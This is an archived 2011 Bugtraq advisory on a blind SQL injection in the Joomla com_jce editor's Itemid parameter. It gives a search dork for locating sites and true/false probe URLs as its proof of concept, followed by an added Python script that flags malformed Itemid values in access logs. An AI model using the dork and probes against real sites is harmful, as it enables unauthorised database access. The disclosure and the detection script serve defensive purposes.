Open Source and information security mailing list archives
 
Message-ID: <20110408162859.26939.qmail@securityfocus.com>
Date: 8 Apr 2011 16:28:59 -0000
From: eidelweiss@...dowslive.com
To: bugtraq@...urityfocus.com
Subject: joomlacontenteditor (com_jce) BLIND sql injection vulnerability

===================================================================
  joomlacontenteditor (com_jce) BLIND sql injection vulnerability
===================================================================
  
Software:   joomlacontenteditor (com_jce)
Vendor:     www.joomlacontenteditor.net
Vuln Type:  Blind SQL Injection
Download link:  http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 (check here)
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info
Dork:       inurl:"/index.php?option=com_jce"
  
  
References: http://eidelweiss-advisories.blogspot.com/2011/04/joomlacontenteditor-comjce-blind-sql.html
  
  
===================================================================

Description:

JCE makes creating and editing Joomla!® content easy. Add a set of tools to your
Joomla!® environment that give you the power to create the kind of content you want,
without limitations, and without needing to know or learn HTML, XHTML, CSS...

===================================================================

    exploit & p0c
  
[!] index.php?option=com_jce&Itemid=[valid Itemid]
  
    Example p0c
  
[!] http://host/index.php?option=com_jce&Itemid=8    <= True
[!] http://host/index.php?option=com_jce&Itemid=-8   <= False
  
  
====================================================================
  
    Nothing Impossible In This World Even Nobody`s Perfect
  
===================================================================
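
Added example, not part of the original advisory: a log check a site operator could run to find com_jce requests whose Itemid is not a single positive integer, the parameter the advisory names. It assumes combined-format access logs and that legitimate Itemid values are positive integers; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the advisory).
SAMPLE_LOG = """\
203.0.113.5 - - [08/Apr/2011:16:01:02 +0000] "GET /index.php?option=com_jce&Itemid=8 HTTP/1.1" 200 5120
203.0.113.5 - - [08/Apr/2011:16:01:03 +0000] "GET /index.php?option=com_jce&Itemid=-8 HTTP/1.1" 200 312
198.51.100.7 - - [08/Apr/2011:16:02:10 +0000] "GET /index.php?option=com_content&Itemid=-3 HTTP/1.1" 200 8841
198.51.100.9 - - [08/Apr/2011:16:03:44 +0000] "GET /index.php?Itemid=8%20extra&option=com_jce HTTP/1.1" 200 5120
198.51.100.9 - - [08/Apr/2011:16:03:45 +0000] "GET /index.php?option=com_jce&Itemid=8&Itemid=x HTTP/1.1" 200 5120
"""

# Client address and request target from a combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# Assumption: a legitimate Itemid is a positive integer with no sign or padding.
ITEMID_RE = re.compile(r"[1-9][0-9]{0,9}")


def valid_itemid(values):
    """True only for exactly one Itemid value that is a plain positive integer."""
    return len(values) == 1 and ITEMID_RE.fullmatch(values[0]) is not None


def suspicious_jce_requests(log_text):
    """Return (client, decoded Itemid values) for com_jce requests with an odd Itemid."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line we understand
        client, target = match.groups()
        # parse_qs percent-decodes values and keeps repeated parameters as a list.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_jce" not in params.get("option", []):
            continue  # other components are out of scope for this check
        itemids = params.get("Itemid", [])
        if itemids and not valid_itemid(itemids):
            findings.append((client, itemids))
    return findings


if __name__ == "__main__":
    for client, itemids in suspicious_jce_requests(SAMPLE_LOG):
        print(f"{client}\tItemid={itemids!r}")
```

The same `valid_itemid` test can be applied as an input filter in front of the application, rejecting the request before the value reaches the component.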
